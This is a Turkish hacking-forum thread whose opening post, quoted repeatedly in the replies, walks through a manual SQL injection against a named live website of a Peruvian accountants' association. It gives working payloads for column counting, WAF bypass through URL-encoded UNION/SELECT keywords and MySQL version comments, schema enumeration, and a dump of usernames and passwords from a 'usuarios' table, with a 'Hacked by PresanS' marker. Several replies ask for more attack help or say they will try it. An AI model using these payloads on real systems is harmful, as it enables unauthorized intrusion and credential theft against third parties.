Manuel SQL İnjection, Waff bypass denemesi #1

Darach · 1 Ara 2021

PresanS' Alıntı:
Öncelikle Herkese Selamun Aleyküm Arkadaşlar

Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz,basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Örnek SQL İnjection içeren web sitemiz ;

http://jdccpp.org.pe/detalle-seminario.php?id=93%27

Error Based hata çıktısı aldığımız zaman bilinki group by kullanarak kısa yol ile kolon sayımızı öğrenebiliriz
Evet burda 14 de hata verdiğini söylüyor, yani kolon sayımız 13 demek .

http://jdccpp.org.pe/detalle-seminario.php?id=93'+GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+-

Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmaya hangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A

dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-

Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('','Hacked by PresanS',' ','<img src=https://i.hizliresim.com/DPrBm6.gif>',' ','database_name=%0A',database(),' ','user=%0A',user(),' ','version=%0A',version(),' '),8,9,10,11,12,13--+-

sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,' '),10,11,12,13+from+information_schema.tables+where+table_schema=database()--+-

evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,' '),10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-

Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,' '),10,11,12,13+from+usuarios--+-

burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10,11,12,13--+-

Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.

ellerine sağlık.

Soulfly28192!sl? · 14 Ocak 2022

Eline sağlık

-Ne kadar sessiz olursan, o kadar çok işitebilirsin…

GMR148 · 20 Ocak 2022

PresanS' Alıntı:
Öncelikle Herkese Selamun Aleyküm Arkadaşlar

Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz, basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Örnek SQL İnjection içeren web sitemiz ;
http://jdccpp.org.pe/detalle-seminario.php?id=93%27

Error Based hata çıktısı aldığımız zaman bilinki group by kullanarak kısa yol ile kolon sayımızı öğrenebiliriz
Evet burda 14 de hata verdiğini söylüyor, yani kolon sayımız 13 demek .
http://jdccpp.org.pe/detalle-seminario.php?id=93'+GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+-

Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmaya hangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A

dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-

Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('','Hacked by PresanS',' ','<img src=https://i.hizliresim.com/DPrBm6.gif>',' ','database_name=%0A',database(),' ','user=%0A',user(),' ','version=%0A',version(),' '),8,9,10,11,12,13--+-

sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,' '),10,11,12,13+from+information_schema.tables+where+table_schema=database()--+-

evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,' '),10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-

Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,' '),10,11,12,13+from+usuarios--+-

burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10,11,12,13--+-

Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.

Elinize sağlık çok güzel konu olmuş.

Ben birşey sormak daha doğrusu öğrenmek istiyorum bu bypass komutlarını nerden öğrendiniz nasıl kullanılacağını nerden biliyorsunuz?
Detaylı bir komu açabilirmisiniz sıfırdan öğrenmeye çalışıyorum da

Örneğin bunları;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */

AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,' '),10,11,12,13+from+usuarios--+-

Ayrıca bir sitede nasıl açık bulabilirim dork kullanmadan belirli bir site üzerinde?

UZAY 52 · 20 Ocak 2022

GMR148' Alıntı:
Ben birşey sormak daha doğrusu öğrenmek istiyorum bu bypass komutlarını nerden öğrendiniz nasıl kullanılacağını nerden biliyorsunuz?
Detaylı bir komu açabilirmisiniz sıfırdan öğrenmeye çalışıyorum da

Örneğin bunları;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */

AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,' '),10,11,12,13+from+usuarios--+-

Ayrıca bir sitede nasıl açık bulabilirim dork kullanmadan belirli bir site üzerinde?

Knk bu konular çok karışık burdan anlatamam ama sitede açık bulman için popüler kali toolları squlmap ve nmap dir ek olarak dnsenum da kullanabilirsin

GMR148 · 20 Ocak 2022

UZAY 52' Alıntı:
Knk bu konular çok karışık burdan anlatamam ama sitede açık bulman için popüler kali toolları squlmap ve nmap dir ek olarak dnsenum da kullanabilirsin

Sqlmap ve nmapde açık bulunmuyor bildiğim kadarıyla? daha önce söylemiştim başka bir konuda sana.
Bulunuyorda ben mi bilmiyorum anlamadım?

Eğer bilgi sahibiysen
DM'den yazabilirsin öğrenmek istiyorum çünkü

Ardatt · 3 Şub 2022

Selamun Aleyküm bypass nedir sql az çok biliyorum bypasz etmek ne demej

challengehunter · 3 Şub 2022

PresanS' Alıntı:
Öncelikle Herkese Selamun Aleyküm Arkadaşlar

Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz, basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Örnek SQL İnjection içeren web sitemiz ;
http://jdccpp.org.pe/detalle-seminario.php?id=93%27

Error Based hata çıktısı aldığımız zaman bilinki group by kullanarak kısa yol ile kolon sayımızı öğrenebiliriz
Evet burda 14 de hata verdiğini söylüyor, yani kolon sayımız 13 demek .
http://jdccpp.org.pe/detalle-seminario.php?id=93'+GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+-

Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmaya hangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A

dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-

Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('','Hacked by PresanS',' ','<img src=https://i.hizliresim.com/DPrBm6.gif>',' ','database_name=%0A',database(),' ','user=%0A',user(),' ','version=%0A',version(),' '),8,9,10,11,12,13--+-

sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,' '),10,11,12,13+from+information_schema.tables+where+table_schema=database()--+-

evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,' '),10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-

Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,' '),10,11,12,13+from+usuarios--+-

burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10,11,12,13--+-

Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.

Elinize sağlık

Ardatt · 3 Şub 2022

Video anlatım varmı

GökBörü. · 3 Şub 2022

PresanS' Alıntı:
Öncelikle Herkese Selamun Aleyküm Arkadaşlar

Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz, basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Örnek SQL İnjection içeren web sitemiz ;
http://jdccpp.org.pe/detalle-seminario.php?id=93%27

Error Based hata çıktısı aldığımız zaman bilinki group by kullanarak kısa yol ile kolon sayımızı öğrenebiliriz
Evet burda 14 de hata verdiğini söylüyor, yani kolon sayımız 13 demek .
http://jdccpp.org.pe/detalle-seminario.php?id=93'+GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+-

Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmaya hangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A

dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-

Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('','Hacked by PresanS',' ','<img src=https://i.hizliresim.com/DPrBm6.gif>',' ','database_name=%0A',database(),' ','user=%0A',user(),' ','version=%0A',version(),' '),8,9,10,11,12,13--+-

sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,' '),10,11,12,13+from+information_schema.tables+where+table_schema=database()--+-

evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,' '),10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-

Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,' '),10,11,12,13+from+usuarios--+-

burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10,11,12,13--+-

Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.

çok güzel olmuş lakin linux üzerinden bilmeyen arkadaşlarada kodlarını nasıl yaptıgını falanda gösterseydin çok güzel olurdu lakin eline emegine yüreğine sağlık

XDLUCKT · 3 Şub 2022

Elinize sağlık hocam.

Elinize sağlık hocam

PresanS · 4 Şub 2022

Aleyküm selam, Teşekkürler arkadaşlar.. Videolu anlatım çekmedim hiç malesef.

GökBörü.' Alıntı:
çok güzel olmuş lakin linux üzerinden bilmeyen arkadaşlarada kodlarını nasıl yaptıgını falanda gösterseydin çok güzel olurdu lakin eline emegine yüreğine sağlık

Linux üzerinden ne farkı var anlamadım?

GökBörü. · 4 Şub 2022

PresanS' Alıntı:
Linux üzerinden ne farkı var anlamadım?

hani linuxda sql kodlarını falan yazıyoruzya onları bilmeyenlere faydası olur diye demiştim

PresanS · 6 Şub 2022

GökBörü.' Alıntı:
hani linuxda sql kodlarını falan yazıyoruzya onları bilmeyenlere faydası olur diye demiştim

linux ta sql kodu derken yine anlamadım demek istediğini? bahsettiğin şeyler dos komutları mı?

rootibo · 2 Haz 2023

PresanS' Alıntı:
Öncelikle Herkese Selamun Aleyküm Arkadaşlar

Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz, basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Örnek SQL İnjection içeren web sitemiz ;
http://jdccpp.org.pe/detalle-seminario.php?id=93%27

Error Based hata çıktısı aldığımız zaman bilinki group by kullanarak kısa yol ile kolon sayımızı öğrenebiliriz
Evet burda 14 de hata verdiğini söylüyor, yani kolon sayımız 13 demek .
http://jdccpp.org.pe/detalle-seminario.php?id=93'+GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+-

Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmaya hangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A

dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-

Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('','Hacked by PresanS',' ','<img src=https://i.hizliresim.com/DPrBm6.gif>',' ','database_name=%0A',database(),' ','user=%0A',user(),' ','version=%0A',version(),' '),8,9,10,11,12,13--+-

sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,' '),10,11,12,13+from+information_schema.tables+where+table_schema=database()--+-

evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,' '),10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-

Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,' '),10,11,12,13+from+usuarios--+-

burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10,11,12,13--+-

Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.

Birkac aydir boyle bir konu ariyordum ellerinize saglik simdi hepsini tek tek deniyecegim

Floria1 · 2 Haz 2023

Eline sağlık

LucaINC1337 · 5 Haz 2023

PresanS' Alıntı:
Öncelikle Herkese Selamun Aleyküm Arkadaşlar

Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz, basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Örnek SQL İnjection içeren web sitemiz ;
http://jdccpp.org.pe/detalle-seminario.php?id=93%27

Error Based hata çıktısı aldığımız zaman bilinki group by kullanarak kısa yol ile kolon sayımızı öğrenebiliriz
Evet burda 14 de hata verdiğini söylüyor, yani kolon sayımız 13 demek .
http://jdccpp.org.pe/detalle-seminario.php?id=93'+GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+-

Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmaya hangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A

dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-

Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('','Hacked by PresanS',' ','<img src=https://i.hizliresim.com/DPrBm6.gif>',' ','database_name=%0A',database(),' ','user=%0A',user(),' ','version=%0A',version(),' '),8,9,10,11,12,13--+-

sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,' '),10,11,12,13+from+information_schema.tables+where+table_schema=database()--+-

evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,' '),10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-

Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,' '),10,11,12,13+from+usuarios--+-

burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.

Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10,11,12,13--+-

Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.

Eline Sağlık

Butcherb3y · 5 Tem 2023

PresanS' Alıntı:
Öncelikle Herkese Selamun Aleyküm Arkadaşlar

Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz, basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Örnek SQL İnjection içeren web sitemiz ;
http://jdccpp.org.pe/detalle-seminario.php?id=93%27

Error Based hata çıktısı aldığımız zaman bilinki group by kullanarak kısa yol ile kolon sayımızı öğrenebiliriz
Evet burda 14 de hata verdiğini söylüyor, yani kolon sayımız 13 demek .
http://jdccpp.org.pe/detalle-seminario.php?id=93'+GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+-

Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmaya hangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A

dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-

Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.

